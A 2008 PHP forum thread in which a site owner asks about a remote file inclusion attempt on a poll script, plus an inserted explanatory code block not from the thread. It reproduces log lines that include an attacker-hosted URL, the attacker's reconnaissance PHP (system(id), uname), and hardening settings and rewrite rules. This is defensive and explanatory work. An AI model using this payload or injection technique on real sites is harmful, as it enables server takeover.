n8w, posted June 21, 2008

I have been having problems with hackers lately. Can you please tell me exactly what this means? I assume there is something insecure in my 3rd party poll? Correct? I made a ton of changes to my site yesterday, and although they were not able to insert stuff onto my pages like before, I got these errors in my error log:

[21-Jun-2008 07:54:37] PHP Warning: include() [<a href='function.include'>function.include</a>]: URL file-access is disabled in the server configuration in /home/user99/public_html/poll/errors.php on line 1
[21-Jun-2008 07:54:37] PHP Warning: include(http://queb3.info/cruise/tnet-id.txt???/errors.php) [<a href='function.include'>function.include</a>]: failed to open stream: no suitable wrapper could be found in /home/user99/public_html/poll/errors.php on line 1
[21-Jun-2008 07:54:37] PHP Warning: include() [<a href='function.include'>function.include</a>]: Failed opening 'http://queb3.info/cruise/tnet-id.txt???/errors.php' for inclusion (include_path='.:/usr/lib/php

When I went to the URL, this is what it says:

<?
echo "BraT<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "NigeriaN HackerS TeaM<br>";
exit;
?>

Link to comment: https://forums.phpfreaks.com/topic/111250-what-is-the-hacker-doing/
DarkWater, posted June 21, 2008

Yes, I'm fairly sure that's it. Good thing you didn't have remote URL access (but this can be a bad thing if you ever need it...). =P Check for any vulnerabilities on Google.

Off-topic: LOLOLOL THE "Nigerian Hackers Team". AHAHAHA.
PFMaBiSmAd, posted June 22, 2008

The script you have is doing an include() where the parameter placed into the include() comes from a GET parameter on the end of the URL, but the script is not validating this external data before operating on it. The hacker is supplying a URL to his site as the GET parameter. The URL he is supplying is outputting raw PHP code. (It is kind of funny that they would use a short open tag <?, because if everyone was following php.net's recommendations to not use and to not enable short open tags, the hacker's code would have no effect.)

If your server had allow_url_fopen and allow_url_include both on, then the raw PHP code would have been included and executed on your server and the various values would have been echoed. Just echoing that information is harmless, but once the hacker knows that he can inject and run his PHP code on your server, the next step is to take over your server for any purpose the hacker wants. Since your server has one or both of the allow_url_xxxxx settings turned off, the hacker is only getting back nothing or possibly the error messages.

This has been said many times before, but here it is again: ALL external data must be validated to ensure it only contains expected values.
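To make the point above concrete, here is an added example (not the poll script from the thread, and not written by any of the posters) showing the unvalidated include() pattern PFMaBiSmAd describes next to a version that treats the GET value only as a key into an allowlist; the parameter name "page" and the file names are assumptions.

```php
<?php
// Added example, not the poll script from the thread. The parameter name
// "page" and the allowlisted file names are assumptions for illustration.

// VULNERABLE PATTERN: whatever arrives in ?page= is spliced into include().
// With allow_url_include on, a URL in that parameter is fetched and executed.
// The trailing "???" in the thread's log is the injected URL's query string,
// which turns the appended "/errors.php" into harmless query data.
function vulnerable_include(string $page): void
{
    include($page . '/errors.php');
}

// HARDENED: the external value is never used as a path. It is only an exact
// key into a fixed map of files the application itself defines.
const PAGE_ALLOWLIST = [
    'vote'    => __DIR__ . '/pages/vote.php',
    'results' => __DIR__ . '/pages/results.php',
];

function resolve_page(string $page): ?string
{
    // Exact-match lookup: URLs, "../" sequences and NUL bytes cannot survive.
    return PAGE_ALLOWLIST[$page] ?? null;
}

function hardened_include(string $page): bool
{
    $file = resolve_page($page);
    if ($file === null) {
        // Log the rejected value (truncated) so repeated probes are visible
        // in the error log, the same place the thread's warnings showed up.
        error_log('rejected page parameter: ' . substr($page, 0, 200));
        http_response_code(400);
        return false;
    }
    include $file;
    return true;
}

// Defense in depth: with both settings off, a future validation slip still
// cannot pull code from a remote URL, which is what saved the poster here.
function remote_include_disabled(): bool
{
    return !filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)
        && !filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN);
}

hardened_include($_GET['page'] ?? '');
```

resolve_page() returning null for anything not in the map is the whole check; the log line it writes gives the same visibility the poster got from PHP's warnings, but before any include is attempted.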
marklarah, posted June 22, 2008

lol. pwd: should be cwd. And don't worry about it, this won't get your pass.
n8w (Author), posted June 22, 2008

I made a lot of changes to my php.ini:

$parm[] = "register_globals = Off";
$parm[] = "session.use_trans_sid = 0";
$parm[] = "display_errors = Off";
$parm[] = "log_errors = on";
$parm[] = "error_log = /home/username/phperrors.log";
$parm[] = "allow_url_fopen = Off";
$parm[] = "allow_url_include = Off";
$parm[] = "session.save_path = /home/username/public_html/secretfolder";
$parm[] = "upload_tmp_dir = /home/username/public_html/secretfolder";
$parm[] = "upload_max_filesize = 1M";

and .htaccess:

#don't view files with the .inc extension
<Files ~ "\.inc$">
Order allow,deny
Deny from all
</Files>

#Preventing remote file include attacks with mod_rewrite
RewriteCond %{QUERY_STRING} (.*)(http|https|ftp):\/\/(.*)
RewriteRule ^(.+)$ - [F]
Demonic, posted June 22, 2008

Nice. I advise you to buy PHP Pro Security by Chris Snyder and Mike Southwell; it's sitting next to me. Part 3 of the book would help you a hell of a lot, and part 2!